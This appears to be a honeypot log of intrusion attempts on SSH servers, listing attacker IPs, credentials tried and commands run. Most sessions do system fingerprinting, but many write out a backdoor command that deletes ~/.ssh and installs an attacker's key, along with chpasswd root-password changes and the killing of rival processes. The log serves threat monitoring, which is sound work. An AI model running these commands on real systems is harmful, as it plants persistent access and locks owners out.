$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ placid_eagle_root (178.128.1.119) โ€” Santa Clara, United States ยท 1 session ยท 2 cmds
2026-06-29 15:30 EDT ยท as oracle/123456a@
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ cryptic_tulip_root (176.65.139.247) โ€” Eygelshoven, The Netherlands ยท 83 sessions ยท 83 cmds
2026-06-18 11:42 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—83
๐ŸŽญ nocturnal_husk_root (197.221.232.44) โ€” Harare, Zimbabwe ยท 1 session ยท 19 cmds
2026-06-29 14:42 EDT ยท as root/qwerty
root/qwerty login โ†’ chattr -ia .ssh to lock shell history โ†’ rm -rf .ssh to clear SSH keys โ†’ chmod +x and execute chpasswd with hardcoded root:ZCtcc9sChJan โ†’ pkill -9 secure.sh/auth.sh to terminate existing processes โ†’ echo > /etc/hosts to clear DNS cache โ†’ cat /proc/cpuinfo | grep model/name
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:ZCtcc9sChJan"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ murky_spice_root (34.100.254.191) โ€” Mumbai, India ยท 1 session ยท 2 cmds
2026-06-29 08:36 EDT ยท as oracle/123456a@
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ obsidian_windmill_root_150 (2.57.122.150) โ€” Amsterdam, The Netherlands ยท 9 sessions ยท 81 cmds
2026-06-29 02:35 EDT ยท as admin/123456, admin/admin123, admin/password
export PATH manipulation โ†’ uname -s -v -n -m execution across multiple paths (bin/uname, busybox) โ†’ /proc/version file existence check โ†’ kernel version extraction via head -1 | cut.
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output" ร—9
$ uname -s -v -n -m 2 > /dev/null ร—9
$ /bin/uname -s -v -n -m 2 > /dev/null ร—9
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—9
$ busybox uname -s -v -n -m 2 > /dev/null ร—9
$ ( [ -f /proc/version ] ร—9
$ [ -f /proc/version ] ร—9
$ head -1 /proc/version | cut -d -f1 ร—9
$ [ -f /etc/os-release ] ร—9
๐ŸŽญ haywire_silk_root (47.113.100.24) โ€” Shenzhen, China ยท 20 sessions ยท 20 cmds
2026-06-28 20:35 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—20
๐ŸŽญ murky_minar_root (124.29.193.114) โ€” Lahore, Pakistan ยท 1 session ยท 3 cmds
2026-06-29 02:06 EDT ยท as root/root
ip โ†’ network mapping โ†’ OS/kernel identification
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ grumpy_burger_db (13.90.206.6) โ€” Boydton, United States ยท 1 session ยท 2 cmds
2026-06-29 00:20 EDT ยท as oracle/oracle123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ velvet_muay_db (117.121.214.50) โ€” Buriram, Thailand ยท 1 session ยท 2 cmds
2026-06-29 00:20 EDT ยท as oracle/oracle123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rogue_dutch_root_239 (45.148.10.239) โ€” Amsterdam, The Netherlands ยท 1 session ยท 1 cmd
2026-06-28 19:17 EDT ยท as oracle/00000000
echo
$ echo OK
๐ŸŽญ stoic_specter_root (91.92.40.8) โ€” Varna, Bulgaria ยท 14 sessions ยท 121 cmds
2026-06-20 20:13 EDT ยท as admin/123456, admin/admin, admin/admin123
PATH normalization โ†’ uname system fingerprinting via multiple binary paths โ†’ /proc/version kernel audit โ†’ /etc/os-release detection โ†’ uptime extraction
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output" ร—13
$ uname -s -v -n -m 2 > /dev/null ร—14
$ /bin/uname -s -v -n -m 2 > /dev/null ร—13
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—13
$ busybox uname -s -v -n -m 2 > /dev/null ร—13
$ ( [ -f /proc/version ] ร—13
$ [ -f /proc/version ] ร—13
$ head -1 /proc/version | cut -d -f1 ร—13
$ [ -f /etc/os-release ] ร—13
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"
$ uname -m 2 > /dev/null
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1
๐ŸŽญ aloof_shadow_root (91.92.40.37) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-06-28 16:46 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ clandestine_pistachio_root (95.38.233.40) โ€” Tehran, Iran ยท 12 sessions ยท 12 cmds
2026-06-28 18:02 EDT ยท as admin/123456, admin/admin, admin/password
echo (repeated echo 12x)
$ echo SHELL_TEST ร—12
๐ŸŽญ stoic_burger_root (141.11.88.9) โ€” Crugers, United States ยท 27 sessions ยท 27 cmds
2026-06-28 13:26 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ listless_clog_root (176.65.139.219) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-28 13:20 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 4x across 4 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ murky_phantom_root (91.92.40.153) โ€” Varna, Bulgaria ยท 31 sessions ยท 31 cmds
2026-06-28 12:45 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ midnight_lucha_root (186.96.145.241) โ€” Mexico City, Mexico ยท 2 sessions ยท 2 cmds
2026-05-13 17:45 EDT ยท as root/password, root/root
Ran uname 113x across 113 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—2
๐ŸŽญ manic_wok_root (124.117.228.98) โ€” Xingfulu, China ยท 2 sessions ยท 2 cmds
2026-06-03 02:27 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m ร—2
๐ŸŽญ savage_star_root (141.11.88.11) โ€” Crugers, United States ยท 27 sessions ยท 27 cmds
2026-06-28 06:46 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 4x across 4 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ vapor_kimchi_root (14.63.198.239) โ€” Seongnam-si, South Korea ยท 1 session ยท 2 cmds
2026-06-28 06:35 EDT ยท as oracle/zaq1@WSX
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ scrappy_cosmo_root_32 (81.23.173.32) โ€” Moscow, Russia ยท 1 session ยท 2 cmds
2026-06-28 05:51 EDT ยท as oracle/zaq1@WSX
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ nocturnal_cipher_root_215 (186.147.162.215) โ€” Cali, Colombia ยท 1 session ยท 2 cmds
2026-06-28 05:33 EDT ยท as oracle/zaq1@WSX
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ wired_burger_sol (141.11.88.12) โ€” Crugers, United States ยท 27 sessions ยท 27 cmds
2026-06-28 00:11 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ venomous_dutch_sol (45.153.34.71) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-27 21:09 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ lurking_lotus_root_57 (182.19.35.57) โ€” Chennai, India ยท 24 sessions ยท 24 cmds
2026-06-27 12:55 EDT ยท as admin/123456, admin/admin, admin/password
echo (repeated echo 12x)
$ echo SHELL_TEST ร—24
๐ŸŽญ crimson_shogun (43.153.147.41) โ€” Tokyo, Japan ยท 1 session ยท 1 cmd
2026-06-27 16:07 EDT ยท as test/test
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ crimson_tulip_root (176.65.139.242) โ€” Eygelshoven, The Netherlands ยท 12 sessions ยท 12 cmds
2026-06-27 15:33 EDT ยท as admin/password, deploy/deploy, docker/docker123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—12
๐ŸŽญ grumpy_toucan_root (170.239.108.21) โ€” Jaboatรฃo dos Guararapes, Brazil ยท 1 session ยท 1 cmd
2026-06-27 15:08 EDT ยท as root/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a && echo "====" && cat /etc/os-release
๐ŸŽญ ironclad_pretzel_root (212.132.120.41) โ€” Berlin, Germany ยท 1 session ยท 19 cmds
2026-06-27 14:56 EDT ยท as root/admin
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:Zpx2587Jv6iM"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ crimson_eagle_root (199.195.254.215) โ€” New York, United States ยท 1 session ยท 19 cmds
2026-06-27 14:27 EDT ยท as root/admin
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:79I0rNXoHjJz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ placid_dutch_root (91.92.42.227) โ€” Amsterdam, The Netherlands ยท 93 sessions ยท 93 cmds
2026-06-20 12:04 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—93
๐ŸŽญ rusty_tulip_root (193.32.162.83) โ€” Amsterdam, The Netherlands ยท 10 sessions ยท 10 cmds
2026-06-25 12:20 EDT ยท as mysql/mysql, mysql/mysql@123, oracle/oracle
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—10
โ†ณ OS/kernel identification
๐ŸŽญ brisk_naija_root (102.88.137.80) โ€” Lagos, Nigeria ยท 2 sessions ยท 22 cmds
2026-06-18 14:53 EDT ยท as admin/admin, oracle/root123
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa..." โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo "admin\ndGicZAIKAuys..."|passwd|bash โ†’ Enter new UNIX password: โ†’ echo "admin\ndG
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
